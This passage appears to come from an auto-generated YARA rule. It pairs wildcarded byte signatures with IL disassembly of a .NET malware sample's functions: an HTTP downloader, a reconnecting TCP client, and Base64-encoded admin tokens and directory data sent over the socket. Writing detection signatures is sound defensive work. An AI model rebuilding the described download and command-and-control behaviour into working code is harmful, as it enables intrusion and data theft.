2FAC 11 1a ldloc.s local(0x001A) + 2FAE 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 2FB3 de 18 leave.s 0x2fcd + 2FB5 13 1d stloc.s local(0x001D) + 2FB7 11 1d ldloc.s local(0x001D) + 2FB9 6f b9 00 00 0a callvirt System.Net.WebException::get_Response + 2FBE 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 2FC3 de 03 leave.s 0x2fc8 + 2FC5 26 pop + 2FC6 de 00 leave.s 0x2fc8 + 2FC8 de 03 leave.s 0x2fcd + 2FCA 26 pop + 2FCB de 00 leave.s 0x2fcd + 2FCD 06 ldloc.0 + 2FCE 2a ret + */ + $c2 = { 72 ?? ?? ?? ?? 0A 03 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 0B 07 1C 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 14 6F ?? ?? ?? ?? 07 19 6F ?? ?? ?? ?? 07 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 20 ?? ?? ?? ?? 17 17 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6A 0C 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 08 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 6F ?? ?? ?? ?? 26 07 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 16 6A 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 04 6F ?? ?? ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 
DC 05 6F ?? ?? ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 11 ?? 7B ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 58 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 11 ?? 18 6A 58 13 ?? 11 ?? 18 6A 58 13 ?? 07 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 05 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 19 17 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 30 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 11 ?? 18 8D ?? ?? 
?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? DE ?? 26 DE ?? 06 2A } + /* +function WebDL.WebDL::_down1 0x0600009b@1c444ebeba24dcba8628b7dfe5fec7c6 with 6 features: + - check if file exists + - create HTTP request + - manipulate console buffer + - receive HTTP response + - send HTTP request + - send data + 3144 72 01 00 00 70 ldstr "" + 3149 0a stloc.0 + 314A 02 ldarg.0 + 314B 04 ldarg.2 + 314C 28 99 00 00 06 call _getName + 3151 0b stloc.1 + 3152 07 ldloc.1 + 3153 72 01 00 00 70 ldstr "" + 3158 28 bd 00 00 0a call System.String::op_Equality + 315D 2c 08 brfalse.s 0x3167 + 315F 06 ldloc.0 + 3160 13 0a stloc.s local(0x000A) + 3162 dd c3 00 00 00 leave 0x322a + 3167 03 ldarg.1 + 3168 07 ldloc.1 + 3169 28 60 00 00 0a call System.IO.Path::Combine + 316E 0c stloc.2 + 316F 08 ldloc.2 + 3170 28 be 00 00 0a call System.Console::WriteLine + 3175 17 ldc.i4.1 + 3176 0d stloc.3 + 3177 2b 1c br.s 0x3195 + 3179 03 ldarg.1 + 317A 09 ldloc.3 + 317B 8c 32 00 00 01 box System.Int32 + 3180 72 13 02 00 70 ldstr "_" + 3185 07 ldloc.1 + 3186 28 28 00 00 0a call System.String::Concat + 318B 28 60 00 00 0a call System.IO.Path::Combine + 3190 0c stloc.2 + 3191 09 ldloc.3 + 3192 17 ldc.i4.1 + 3193 58 add + 3194 0d stloc.3 + 3195 08 ldloc.2 + 3196 28 bf 00 00 0a call System.IO.File::Exists + 319B 2d dc brtrue.s 0x3179 + 319D 08 ldloc.2 + 319E 28 c0 00 00 0a call System.IO.File::OpenWrite + 31A3 13 04 stloc.s local(0x0004) + 31A5 20 00 00 10 00 ldc.i4 0x100000 + 31AA 8d 3d 00 00 01 newarr System.Byte + 31AF 13 05 stloc.s local(0x0005) + 31B1 04 ldarg.2 + 31B2 28 97 00 00 0a call 
System.Net.WebRequest::Create + 31B7 75 58 00 00 01 isinst System.Net.HttpWebRequest + 31BC 13 06 stloc.s local(0x0006) + 31BE 11 06 ldloc.s local(0x0006) + 31C0 6f b3 00 00 0a callvirt System.Net.WebRequest::GetResponse + 31C5 75 67 00 00 01 isinst System.Net.HttpWebResponse + 31CA 13 07 stloc.s local(0x0007) + 31CC 11 07 ldloc.s local(0x0007) + 31CE 6f b4 00 00 0a callvirt System.Net.WebResponse::GetResponseStream + 31D3 13 08 stloc.s local(0x0008) + 31D5 11 08 ldloc.s local(0x0008) + 31D7 11 05 ldloc.s local(0x0005) + 31D9 16 ldc.i4.0 + 31DA 11 05 ldloc.s local(0x0005) + 31DC 8e ldlen + 31DD 69 conv.i4 + 31DE 6f 84 00 00 0a callvirt System.IO.Stream::Read + 31E3 13 09 stloc.s local(0x0009) + 31E5 2b 1c br.s 0x3203 + 31E7 11 04 ldloc.s local(0x0004) + 31E9 11 05 ldloc.s local(0x0005) + 31EB 16 ldc.i4.0 + 31EC 11 09 ldloc.s local(0x0009) + 31EE 6f 89 00 00 0a callvirt System.IO.Stream::Write + 31F3 11 08 ldloc.s local(0x0008) + 31F5 11 05 ldloc.s local(0x0005) + 31F7 16 ldc.i4.0 + 31F8 11 05 ldloc.s local(0x0005) + 31FA 8e ldlen + 31FB 69 conv.i4 + 31FC 6f 84 00 00 0a callvirt System.IO.Stream::Read + 3201 13 09 stloc.s local(0x0009) + 3203 11 09 ldloc.s local(0x0009) + 3205 16 ldc.i4.0 + 3206 30 df bgt.s 0x31e7 + 3208 11 08 ldloc.s local(0x0008) + 320A 6f b2 00 00 0a callvirt System.IO.Stream::Close + 320F 11 07 ldloc.s local(0x0007) + 3211 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 3216 11 04 ldloc.s local(0x0004) + 3218 6f b2 00 00 0a callvirt System.IO.Stream::Close + 321D 72 17 02 00 70 ldstr "OK" + 3222 0a stloc.0 + 3223 de 03 leave.s 0x3228 + 3225 26 pop + 3226 de 00 leave.s 0x3228 + 3228 06 ldloc.0 + 3229 2a ret + 322A 11 0a ldloc.s local(0x000A) + 322C 2a ret + */ + $c3 = { 72 ?? ?? ?? ?? 0A 02 04 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 13 ?? DD ?? ?? ?? ?? 03 07 28 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 17 0D 2B ?? 03 09 8C ?? ?? ?? ?? 72 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 09 17 58 0D 08 28 ?? ?? ?? ?? 2D ?? 
08 28 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 04 28 ?? ?? ?? ?? 75 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 75 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 30 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 0A DE ?? 26 DE ?? 06 2A 11 ?? 2A } + /* +function Sockets.MySocket::<.ctor>b__0 0x0600008a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - act as TCP client + 2394 20 f4 01 00 00 ldc.i4 0x1f4 + 2399 28 6a 00 00 0a call System.Threading.Thread::Sleep + 239E 20 00 00 a0 00 ldc.i4 0xa00000 + 23A3 8d 3d 00 00 01 newarr System.Byte + 23A8 0a stloc.0 + 23A9 38 11 01 00 00 br 0x24bf + 23AE 02 ldarg.0 + 23AF 7b 8a 00 00 04 ldfld _tcpClient + 23B4 3a 9d 00 00 00 brtrue 0x2456 + 23B9 02 ldarg.0 + 23BA 73 7d 00 00 0a newobj System.Net.Sockets.TcpClient::.ctor + 23BF 7d 8a 00 00 04 stfld _tcpClient + 23C4 02 ldarg.0 + 23C5 7b 8a 00 00 04 ldfld _tcpClient + 23CA 20 00 00 a0 00 ldc.i4 0xa00000 + 23CF 6f 7e 00 00 0a callvirt System.Net.Sockets.TcpClient::set_SendBufferSize + 23D4 02 ldarg.0 + 23D5 7b 8a 00 00 04 ldfld _tcpClient + 23DA 20 00 00 a0 00 ldc.i4 0xa00000 + 23DF 6f 7f 00 00 0a callvirt System.Net.Sockets.TcpClient::set_ReceiveBufferSize + 23E4 02 ldarg.0 + 23E5 7b 8a 00 00 04 ldfld _tcpClient + 23EA 02 ldarg.0 + 23EB 7b 8e 00 00 04 ldfld __host + 23F0 02 ldarg.0 + 23F1 7b 8f 00 00 04 ldfld __port + 23F6 6f 80 00 00 0a callvirt System.Net.Sockets.TcpClient::Connect + 23FB 02 ldarg.0 + 23FC 02 ldarg.0 + 23FD 7b 8a 00 00 04 ldfld _tcpClient + 2402 6f 81 00 00 0a callvirt System.Net.Sockets.TcpClient::GetStream + 2407 7d 8b 00 00 04 stfld _networkStream + 240C 02 ldarg.0 + 240D 17 ldc.i4.1 + 240E 7d 89 00 00 04 stfld isConnected + 2413 02 ldarg.0 + 2414 7b 90 00 00 04 ldfld onConnected + 2419 2c 11 brfalse.s 0x242c + 241B 02 ldarg.0 + 241C 7b 90 00 00 04 ldfld onConnected + 
2421 02 ldarg.0 + 2422 7b 89 00 00 04 ldfld isConnected + 2427 6f 82 00 00 0a callvirt Invoke + 242C de 28 leave.s 0x2456 + 242E 26 pop + 242F 02 ldarg.0 + 2430 16 ldc.i4.0 + 2431 7d 89 00 00 04 stfld isConnected + 2436 02 ldarg.0 + 2437 14 ldnull + 2438 7d 8a 00 00 04 stfld _tcpClient + 243D 02 ldarg.0 + 243E 14 ldnull + 243F 7d 8b 00 00 04 stfld _networkStream + 2444 28 83 00 00 0a call System.GC::Collect + 2449 02 ldarg.0 + 244A 7b 88 00 00 04 ldfld reConnectionDelay + 244F 28 6a 00 00 0a call System.Threading.Thread::Sleep + 2454 de 00 leave.s 0x2456 + 2456 02 ldarg.0 + 2457 7b 8b 00 00 04 ldfld _networkStream + 245C 2c 37 brfalse.s 0x2495 + 245E 02 ldarg.0 + 245F 7b 8b 00 00 04 ldfld _networkStream + 2464 06 ldloc.0 + 2465 16 ldc.i4.0 + 2466 06 ldloc.0 + 2467 8e ldlen + 2468 69 conv.i4 + 2469 6f 84 00 00 0a callvirt System.IO.Stream::Read + 246E 0b stloc.1 + 246F 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2474 06 ldloc.0 + 2475 16 ldc.i4.0 + 2476 07 ldloc.1 + 2477 6f 85 00 00 0a callvirt System.Text.Encoding::GetString + 247C 0c stloc.2 + 247D 07 ldloc.1 + 247E 16 ldc.i4.0 + 247F 31 14 ble.s 0x2495 + 2481 02 ldarg.0 + 2482 7b 91 00 00 04 ldfld onData + 2487 2c 0c brfalse.s 0x2495 + 2489 02 ldarg.0 + 248A 7b 91 00 00 04 ldfld onData + 248F 08 ldloc.2 + 2490 6f 6c 00 00 0a callvirt Invoke + 2495 de 21 leave.s 0x24b8 + 2497 26 pop + 2498 02 ldarg.0 + 2499 14 ldnull + 249A 7d 8a 00 00 04 stfld _tcpClient + 249F 02 ldarg.0 + 24A0 14 ldnull + 24A1 7d 8b 00 00 04 stfld _networkStream + 24A6 28 83 00 00 0a call System.GC::Collect + 24AB 02 ldarg.0 + 24AC 7b 88 00 00 04 ldfld reConnectionDelay + 24B1 28 6a 00 00 0a call System.Threading.Thread::Sleep + 24B6 de 00 leave.s 0x24b8 + 24B8 1f 0a ldc.i4.s 0xa + 24BA 28 6a 00 00 0a call System.Threading.Thread::Sleep + 24BF 02 ldarg.0 + 24C0 7b 8d 00 00 04 ldfld _isRunning + 24C5 3a e4 fe ff ff brtrue 0x23ae + 24CA 2a ret + */ + $c4 = { 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A 38 ?? ?? ?? ?? 
02 7B ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 02 16 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 06 16 06 8E 69 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 06 16 07 6F ?? ?? ?? ?? 0C 07 16 31 ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 08 6F ?? ?? ?? ?? DE ?? 26 02 14 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 1F ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 3A ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__1 0x06000023@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - decode data using Base64 in .NET + 07FA 02 ldarg.0 + 07FB 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 0800 02 ldarg.0 + 0801 7b 9d 00 00 04 ldfld _text1 + 0806 28 47 00 00 0a call System.Convert::FromBase64String + 080B 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 0810 7d 9d 00 00 04 stfld _text1 + 0815 2a ret + */ + $c5 = { 02 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 
2A } + /* +function test_A1.Form1::b__14 0x0600001b@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 04D8 02 ldarg.0 + 04D9 7b 23 00 00 04 ldfld mySocket + 04DE 17 ldc.i4.1 + 04DF 8c 32 00 00 01 box System.Int32 + 04E4 72 23 00 00 70 ldstr "|" + 04E9 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 04EE 7e 22 00 00 04 ldsfld _TOKEN_ + 04F3 72 23 00 00 70 ldstr "|" + 04F8 16 ldc.i4.0 + 04F9 8c 32 00 00 01 box System.Int32 + 04FE 28 28 00 00 0a call System.String::Concat + 0503 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 0508 28 2b 00 00 0a call System.Convert::ToBase64String + 050D 28 28 00 00 0a call System.String::Concat + 0512 6f 88 00 00 06 callvirt Send + 0517 26 pop + 0518 2a ret + */ + $c6 = { 02 7B ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 2A } + /* +function Reqss.Reqss::b__6 0x06000028@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 0884 02 ldarg.0 + 0885 1c ldc.i4.6 + 0886 8d 01 00 00 01 newarr System.Object + 088B 0a stloc.0 + 088C 06 ldloc.0 + 088D 16 ldc.i4.0 + 088E 20 a0 86 01 00 ldc.i4 0x186a0 + 0893 8c 32 00 00 01 box System.Int32 + 0898 a2 stelem.ref + 0899 06 ldloc.0 + 089A 17 ldc.i4.1 + 089B 72 23 00 00 70 ldstr "|" + 08A0 a2 stelem.ref + 08A1 06 ldloc.0 + 08A2 18 ldc.i4.2 + 08A3 02 ldarg.0 + 08A4 7b 98 00 00 04 ldfld _adm_token + 08A9 a2 stelem.ref + 08AA 06 ldloc.0 + 08AB 19 ldc.i4.3 + 08AC 72 23 00 00 70 ldstr "|" + 08B1 a2 stelem.ref + 08B2 06 ldloc.0 + 08B3 1a ldc.i4.4 + 08B4 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 08B9 02 ldarg.0 + 08BA 7b 9e 00 00 04 ldfld _temp_dir1 + 08BF 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 08C4 28 2b 00 00 0a call System.Convert::ToBase64String + 08C9 a2 stelem.ref + 08CA 06 ldloc.0 + 08CB 1b ldc.i4.5 + 08CC 72 23 00 00 70 ldstr "|" + 08D1 a2 stelem.ref + 08D2 06 
ldloc.0 + 08D3 28 49 00 00 0a call System.String::Concat + 08D8 7d 97 00 00 04 stfld _socket_res + 08DD 2a ret + */ + $c7 = { 02 1C 8D ?? ?? ?? ?? 0A 06 16 20 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 06 17 72 ?? ?? ?? ?? A2 06 18 02 7B ?? ?? ?? ?? A2 06 19 72 ?? ?? ?? ?? A2 06 1A 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 06 1B 72 ?? ?? ?? ?? A2 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__a 0x0600002c@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 09B4 02 ldarg.0 + 09B5 25 dup + 09B6 7b 97 00 00 04 ldfld _socket_res + 09BB 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 09C0 02 ldarg.0 + 09C1 7b a1 00 00 04 ldfld _res2 + 09C6 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 09CB 28 2b 00 00 0a call System.Convert::ToBase64String + 09D0 28 50 00 00 0a call System.String::Concat + 09D5 7d 97 00 00 04 stfld _socket_res + 09DA 2a ret + */ + $c8 = { 02 25 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 
2A } + /* +function <>c__DisplayClassa1::b__33 0x060000a0@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 0F20 1b ldc.i4.5 + 0F21 8d 01 00 00 01 newarr System.Object + 0F26 0b stloc.1 + 0F27 07 ldloc.1 + 0F28 16 ldc.i4.0 + 0F29 20 50 34 03 00 ldc.i4 0x33450 + 0F2E 8c 32 00 00 01 box System.Int32 + 0F33 a2 stelem.ref + 0F34 07 ldloc.1 + 0F35 17 ldc.i4.1 + 0F36 72 23 00 00 70 ldstr "|" + 0F3B a2 stelem.ref + 0F3C 07 ldloc.1 + 0F3D 18 ldc.i4.2 + 0F3E 7e 28 00 00 04 ldsfld _1_shll_ + 0F43 7b 87 00 00 04 ldfld _adm_token + 0F48 a2 stelem.ref + 0F49 07 ldloc.1 + 0F4A 19 ldc.i4.3 + 0F4B 72 23 00 00 70 ldstr "|" + 0F50 a2 stelem.ref + 0F51 07 ldloc.1 + 0F52 1a ldc.i4.4 + 0F53 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 0F58 03 ldarg.1 + 0F59 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 0F5E 28 2b 00 00 0a call System.Convert::ToBase64String + 0F63 a2 stelem.ref + 0F64 07 ldloc.1 + 0F65 28 49 00 00 0a call System.String::Concat + 0F6A 0a stloc.0 + 0F6B 06 ldloc.0 + 0F6C 72 01 00 00 70 ldstr "" + 0F71 28 2c 00 00 0a call System.String::op_Inequality + 0F76 2c 0d brfalse.s 0xf85 + 0F78 02 ldarg.0 + 0F79 7b b0 00 00 04 ldfld mySocket + 0F7E 06 ldloc.0 + 0F7F 6f 88 00 00 06 callvirt Send + 0F84 26 pop + 0F85 2a ret + */ + $c9 = { 1B 8D ?? ?? ?? ?? 0B 07 16 20 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 07 17 72 ?? ?? ?? ?? A2 07 18 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? A2 07 19 72 ?? ?? ?? ?? A2 07 1A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 
26 2A } + /* +function Funcss.Funcs::CreateMD5 0x0600001d@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - hash data with MD5 + 071C 28 3a 00 00 0a call System.Security.Cryptography.MD5::Create + 0721 0a stloc.0 + 0722 28 3b 00 00 0a call System.Text.Encoding::get_ASCII + 0727 02 ldarg.0 + 0728 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 072D 0b stloc.1 + 072E 06 ldloc.0 + 072F 07 ldloc.1 + 0730 6f 3c 00 00 0a callvirt System.Security.Cryptography.HashAlgorithm::ComputeHash + 0735 0c stloc.2 + 0736 73 3d 00 00 0a newobj System.Text.StringBuilder::.ctor + 073B 0d stloc.3 + 073C 16 ldc.i4.0 + 073D 13 04 stloc.s local(0x0004) + 073F 2b 1f br.s 0x760 + 0741 09 ldloc.3 + 0742 08 ldloc.2 + 0743 11 04 ldloc.s local(0x0004) + 0745 8f 3d 00 00 01 ldelema System.Byte + 074A 72 33 00 00 70 ldstr "x2" + 074F 28 3e 00 00 0a call System.Byte::ToString + 0754 6f 3f 00 00 0a callvirt System.Text.StringBuilder::Append + 0759 26 pop + 075A 11 04 ldloc.s local(0x0004) + 075C 17 ldc.i4.1 + 075D 58 add + 075E 13 04 stloc.s local(0x0004) + 0760 11 04 ldloc.s local(0x0004) + 0762 08 ldloc.2 + 0763 8e ldlen + 0764 69 conv.i4 + 0765 32 da blt.s 0x741 + 0767 09 ldloc.3 + 0768 6f 40 00 00 0a callvirt System.Object::ToString + 076D 13 05 stloc.s local(0x0005) + 076F de 0a leave.s 0x77b + 0771 06 ldloc.0 + 0772 2c 06 brfalse.s 0x77a + 0774 06 ldloc.0 + 0775 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 077A dc endfinally + 077B 11 05 ldloc.s local(0x0005) + 077D 2a ret + */ + $c10 = { 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B 06 07 6F ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 16 13 ?? 2B ?? 09 08 11 ?? 8F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 32 ?? 09 6F ?? ?? ?? ?? 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 11 ?? 
